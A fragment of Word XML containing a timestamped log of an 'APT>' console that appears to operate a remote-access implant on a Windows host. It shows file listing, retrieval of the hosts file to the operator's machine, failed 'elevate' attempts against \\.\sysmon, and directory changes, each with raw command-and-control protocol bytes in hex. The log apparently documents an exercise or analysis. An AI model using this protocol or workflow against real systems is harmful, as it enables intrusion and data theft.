      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6005A3B4" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>15:46</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="536619D0" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">APT&gt;ls                                                                                                                            </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EF93035" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">sending: '\x08\x00\x00\x00\x18\x00\x00\x00' (8 bytes)                                                                             </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08BB2D76" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">00000000: 08 00 00 00 18 00 00 00                          ........                                                               </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FCBB0EE" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">received:                                                                                                                         </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="144F629F" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">00000000: 4A 00 00 00 19 00 00 00 00 00 00 00 32 00 00 00  J...........2...                                                       </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44871E2A" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">00000010: 32 00 00 00 00 00 00 00 2E 0A 2E 2E 0A 68 6F 73  2............hos                                                       </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E9D1823" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">00000020: 74 73 0A 6C 6D 68 6F 73 74 73 2E 73 61 6D 0A 6E  ts.lmhosts.sam.n                                                       </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BB3B940" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">00000030: 65 74 77 6F 72 6B 73 0A 70 72 6F 74 6F 63 6F 6C  etworks.protocol                                                       </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78D6B17A" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">00000040: 0A 73 65 72 76 69 63 65 73 0A                    .services.                                                             </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F637E5E" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">apt returned: .                                                                                                                   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06F3CF78" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">..                                                                                                                                </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="526AD09C" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">hosts                                                                                                                             </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66D1DC57" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">lmhosts.sam                                                                                                                       </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BFEF67C" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">networks                                                                                                                          </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F42B6B6" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">protocol                                                                                                                          </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D68186A" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">services  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D7D9277" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5568D804" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>15:48</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3233E3CD" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">APT&gt;getfile hosts /home/admin/hosts_w2                                                                                            </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BB6FADB" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">sending: '\x1e\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00hosts\x00' (30 bytes)   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05C24CB3" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">00000000: 1E 00 00 00 04 00 00 00 00 00 00 00 06 00 00 00  ................                                                       </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A0517CB" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">00000010: 06 00 00 00 00 00 00 00 68 6F 73 74 73 00        ........hosts.                                                         </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="006E7308" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">received: '-\x08\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x15\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00# Copyright (c) 1993-2009 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="283FBACC" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Microsoft Corp.\r\n#\r\n# This is a sample HOSTS file used by Microsoft TCP/IP for'...'dp\r\n' (2093 bytes)                       </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FEDE320" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[Errno 2] No such file or directory: '/home/admin/hosts_w2'                                                                       </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="542F1EC0" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">APT&gt;getfile hosts /home/kududyn/hosts_w2                                                                                          </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EBB7EF6" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">sending: '\x1e\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00hosts\x00' (30 bytes)   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A025F02" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">00000000: 1E 00 00 00 04 00 00 00 00 00 00 00 06 00 00 00  ................                                                       </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7803C00A" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">00000010: 06 00 00 00 00 00 00 00 68 6F 73 74 73 00        ........hosts.                                                         </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42EB4A8D" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">received: '-\x08\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x15\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00# Copyright (c) 1993-2009 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5797D412" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Microsoft Corp.\r\n#\r\n# This is a sample HOSTS file used by Microsoft TCP/IP for'...'dp\r\n' (2093 bytes)                       </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76AF9000" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">MD5(/home/kududyn/hosts_w2) = 6758175a6827644fb1d3e917508848a8                                                                    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48344B8E" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">APT&gt;                                                             </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="194374A9" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4BDF245A" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>15:49</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A8269EF" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">APT&gt;elevate \\\\.\\sysmon                                                                                                         </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0826DC7B" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">sending: "'\x00\x00\x00 \x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x0e\x00\x00\x001\\\\\\\\.\\\\sysmon\x00" (39 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55E50850" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">bytes)                                                                                                                            </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E7CD6A7" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">00000000: 27 00 00 00 20 00 00 00 00 00 00 00 01 00 00 00  '... ...........                                                       </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2643AC98" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">00000010: 01 00 00 00 0E 00 00 00 31 5C 5C 5C 5C 2E 5C 5C  ........1\\\\.\\                                                       </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D411A97" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">00000020: 73 79 73 6D 6F 6E 00                             sysmon.                                                                </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15A5BE64" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">received:                                                                                                                         </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1285CA43" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">00000000: 1C 00 00 00 21 00 00 00 00 00 00 00 04 00 00 00  ....!...........                                                       </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31AD2E34" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">00000010: 04 00 00 00 00 00 00 00 FF FF FF FF              ............                                                           </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BD24DC4" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">apt returned: 4294967295                                                                                                          </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DFE3FFB" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">APT&gt;elevate \\.\sysmon                                                                                                            </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DE9499E" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>sending: '$\x00\x00\x00 \x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x0b\x00\x00\x001\\\\.\\sysmon\x00' (36 bytes)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49B9E62C" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">00000000: 24 00 00 00 20 00 00 00 00 00 00 00 01 00 00 00  $... ...........                                                       </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BC01387" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">00000010: 01 00 00 00 0B 00 00 00 31 5C 5C 2E 5C 73 79 73  ........1\\.\sys                                                       </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12BA1151" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">00000020: 6D 6F 6E 00                                      mon.                                                                   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0736F9DD" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">received:                                                                                                                         </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="631C57EB" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">00000000: 1C 00 00 00 21 00 00 00 00 00 00 00 04 00 00 00  ....!...........                                                       </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5165BAE5" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">00000010: 04 00 00 00 00 00 00 00 FF FF FF FF              ............                                                           </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46BFCBF1" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">apt returned: 4294967295  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46FFB3D8" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5AA33065" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>15:51</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4184851B" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">APT&gt;cd ..                                                                                                                         </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13F344AA" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">sending: '\x1b\x00\x00\x00\x12\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00\x03\x00\x00\x00\x00\x00\x00\x00..\x00' (27 bytes)      </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="769DD7CA" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">00000000: 1B 00 00 00 12 00 00 00 00 00 00 00 03 00 00 00  ................                                                       </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="206C5CC4" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">00000010: 03 00 00 00 00 00 00 00 2E 2E 00                 ...........                                                            </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="782F92C2" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">received:                                                                                                                         </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="541E0839" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">00000000: 1C 00 00 00 13 00 00 00 00 00 00 00 04 00 00 00  ................                                                       </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F2E5457" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">00000010: 04 00 00 00 00 00 00 00 00 00 00 00              ............                                                           </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F665B15" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">apt returned: 0                                                                                                                   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24C1076D" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">APT&gt;cd ..                                                                                                                         </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C46AF6D" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">sending: '\x1b\x00\x00\x00\x12\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00\x03\x00\x00\x00\x00\x00\x00\x00..\x00' (27 bytes)      </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EC49F5E" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">00000000: 1B 00 00 00 12 00 00 00 00 00 00 00 03 00 00 00  ................                                                       </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3822D0E2" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">00000010: 03 00 00 00 00 00 00 00 2E 2E 00                 ...........                                                            </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AB451FC" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">received:                                                                                                                         </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62B9E8E4" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">00000000: 1C 00 00 00 13 00 00 00 00 00 00 00 04 00 00 00  ................                                                       </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11286373" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">00000010: 04 00 00 00 00 00 00 00 00 00 00 00              ............                                                           </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="557BE67A" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">apt returned: 0                                                                                                                   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D45BCE7" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">APT&gt;pwd                                                                                                                           </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="476C9095" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">sending: '\x08\x00\x00\x00\x14\x00\x00\x00' (8 bytes)                                                                             </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AF3737B" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">00000000: 08 00 00 00 14 00 00 00                          ........                                                               </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58A1F6DF" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">received:                                                                                                                         </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5888A3E6" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">00000000: 1C 00 00 00 15 00 00 00 00 00 00 00 04 00 00 00  ................                                                       </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D04950F" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">00000010: 04 00 00 00 00 00 00 00 43 3A 5C 00              ........C:\.                                                           </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03D72683" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">apt returned: C:\    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FED1CB2" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7672BFD6" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>15:52</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B367997" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">APT&gt;cd admin                                                                                                                      </w:t>
      </w:r>
    </w:p>
